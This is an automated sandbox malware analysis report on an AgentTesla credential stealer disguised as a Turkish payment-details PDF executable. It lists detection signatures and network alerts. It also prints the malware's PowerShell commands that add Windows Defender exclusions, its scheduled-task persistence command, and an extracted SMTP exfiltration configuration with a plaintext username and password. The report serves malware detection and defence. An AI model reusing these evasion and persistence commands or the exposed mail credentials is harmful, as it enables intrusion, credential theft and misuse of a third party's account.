Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U00d6DEME DETAYLARI_PDF.exe

Overview

General Information

Sample Name:#U00d6DEME DETAYLARI_PDF.exe
Analysis ID:612096
MD5:55f4edc3a387f831d2fee28c7f6464d9
SHA1:2ede67420207dd8a0c8284941032bd32a6c49c20
SHA256:16395a650df60656b26e6dc7a6674c64a6348b5d24a93f171d8627c501698e61
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Sigma detected: Suspicious Add Scheduled Task From User AppData Temp
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Sigma detected: Suspicious Outbound SMTP Connections
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • #U00d6DEME DETAYLARI_PDF.exe (PID: 6816 cmdline: "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe" MD5: 55F4EDC3A387F831D2FEE28C7F6464D9)
    • powershell.exe (PID: 5588 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5640 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OsAcNRt.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5280 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OsAcNRt" /XML "C:\Users\user\AppData\Local\Temp\tmp9B9E.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"Exfil Mode": "SMTP", "Username": "info@yapaszincir.com.tr", "Password": "Yapas-2021YP*", "Host": "mail.yapaszincir.com.tr"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.427513871.0000000002F91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000009.00000000.415725263.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000000.415725263.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000009.00000002.624993533.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000009.00000002.624993533.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            Click to see the 14 entries
            SourceRuleDescriptionAuthorStrings
            9.2.#U00d6DEME DETAYLARI_PDF.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              9.2.#U00d6DEME DETAYLARI_PDF.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                9.2.#U00d6DEME DETAYLARI_PDF.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x329ec:$s10: logins
                • 0x32459:$s11: credential
                • 0x2eaaf:$g1: get_Clipboard
                • 0x2eabd:$g2: get_Keyboard
                • 0x2eaca:$g3: get_Password
                • 0x2fd83:$g4: get_CtrlKeyDown
                • 0x2fd93:$g5: get_ShiftKeyDown
                • 0x2fda4:$g6: get_AltKeyDown
                9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.12.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.12.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    Click to see the 28 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OsAcNRt" /XML "C:\Users\user\AppData\Local\Temp\tmp9B9E.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OsAcNRt" /XML "C:\Users\user\AppData\Local\Temp\tmp9B9E.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe" , ParentImage: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, ParentProcessId: 6816, ParentProcessName: #U00d6DEME DETAYLARI_PDF.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OsAcNRt" /XML "C:\Users\user\AppData\Local\Temp\tmp9B9E.tmp, ProcessId: 5280, ProcessName: schtasks.exe
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 78.135.65.4, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, Initiated: true, ProcessId: 6972, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49748
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, ProcessId: 6816, TargetFilename: C:\Users\user\AppData\Roaming\OsAcNRt.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe" , ParentImage: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, ParentProcessId: 6816, ParentProcessName: #U00d6DEME DETAYLARI_PDF.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, ProcessId: 5588, ProcessName: powershell.exe
                    Source: Process startedAuthor: frack113: Data: Command: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, CommandLine: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, NewProcessName: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, OriginalFileName: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, ParentCommandLine: "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe" , ParentImage: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, ParentProcessId: 6816, ParentProcessName: #U00d6DEME DETAYLARI_PDF.exe, ProcessCommandLine: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, ProcessId: 6972, ProcessName: #U00d6DEME DETAYLARI_PDF.exe
                    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132949660801158217.5588.DefaultAppDomain.powershell
                    Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5588, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 3676, ProcessName: conhost.exe
                    Timestamp:04/20/22-15:08:27.762367 04/20/22-15:08:27.762367
                    SID:2839723
                    Source Port:49748
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4046570.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "info@yapaszincir.com.tr", "Password": "Yapas-2021YP*", "Host": "mail.yapaszincir.com.tr"}
                    Source: #U00d6DEME DETAYLARI_PDF.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\OsAcNRt.exeJoe Sandbox ML: detected
                    Source: 9.2.#U00d6DEME DETAYLARI_PDF.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                    Source: #U00d6DEME DETAYLARI_PDF.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    Source: #U00d6DEME DETAYLARI_PDF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49748 -> 78.135.65.4:587
                    Source: TrafficSnort IDS: 2850920 ETPRO TROJAN MSIL/Kryptik.AEBF Sending Stolen Credentials to CnC 192.168.2.6:49748 -> 78.135.65.4:587
                    Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.6:49748 -> 78.135.65.4:587
                    Source: Joe Sandbox ViewASN Name: PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR
                    Source: global trafficTCP traffic: 192.168.2.6:49748 -> 78.135.65.4:587
                    Source: global trafficTCP traffic: 192.168.2.6:49748 -> 78.135.65.4:587
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.626732315.00000000033F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.626732315.00000000033F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.626732315.00000000033F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://HuLJDa.com
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.366108384.00000000060D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.w
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.365039574.00000000060C6000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.365091666.00000000060C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://en.wikipep
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.627600221.000000000370B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.yapaszincir.com.tr
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.627600221.000000000370B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oZi3Kd9J6L9d6D.org
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.433081371.00000000060A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://purl.r
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.427513871.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.369548344.0000000006100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.368458467.0000000006100000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.368474145.0000000006100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers-
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.368187688.0000000006100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/J
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.374698181.0000000006100000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.374796647.0000000006100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersJHZH
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.374601381.0000000006100000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.374860903.0000000006100000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.374698181.0000000006100000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.374796647.0000000006100000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.369260326.0000000006100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designerskH;H
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.368215300.00000000060D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.364650790.00000000060E1000.00000004.00000800.00020000.00000000.sdmp, #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000003.364721712.00000000060E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comJ
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434923808.0000000007692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.627600221.000000000370B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yapaszincir.com.tr
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000009.00000002.626732315.00000000033F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownDNS traffic detected: queries for: mail.yapaszincir.com.tr

                    System Summary

                    barindex
                    Source: 9.2.#U00d6DEME DETAYLARI_PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4046570.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4046570.4.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4012150.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4012150.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.3f99930.5.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: initial sampleStatic PE information: Filename: #U00d6DEME DETAYLARI_PDF.exe
                    Source: 9.2.#U00d6DEME DETAYLARI_PDF.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bD14893DBu002dFD2Eu002d4623u002d876Au002dFAC0924E9482u007d/u0038B03A901u002dB6C9u002d4660u002dAAF9u002dE705CEA09F1A.csLarge array initialization: .cctor: array initializer size 11606
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007bD14893DBu002dFD2Eu002d4623u002d876Au002dFAC0924E9482u007d/u0038B03A901u002dB6C9u002d4660u002dAAF9u002dE705CEA09F1A.csLarge array initialization: .cctor: array initializer size 11606
                    Source: #U00d6DEME DETAYLARI_PDF.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    Source: 9.2.#U00d6DEME DETAYLARI_PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4046570.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4046570.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4012150.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4012150.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.3f99930.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 0_2_054B3C78
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 0_2_054BBB78
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 0_2_064B2370
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 0_2_064B4AA8
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_032BF3C8
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_032BF080
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651B718
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_0651C468
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeCode function: 9_2_06510040
                    Source: #U00d6DEME DETAYLARI_PDF.exeBinary or memory string: OriginalFilename vs #U00d6DEME DETAYLARI_PDF.exe
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.427513871.0000000002F91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBXbDcfeeUnpOrEaBmKCQDSJebEJWwohtlb.exe4 vs #U00d6DEME DETAYLARI_PDF.exe
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.434419676.00000000064D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameIntrospective.dll" vs #U00d6DEME DETAYLARI_PDF.exe
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.437355287.0000000007F20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs #U00d6DEME DETAYLARI_PDF.exe
                    Source: #U00d6DEME DETAYLARI_PDF.exe, 00000000.00000002.428463798.0000000003F91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBXbDcfeeUnpOrEaBmKCQDSJebEJWwohtlb.exe4 vs #U00d6DEME DETAYLARI_PDF.exe
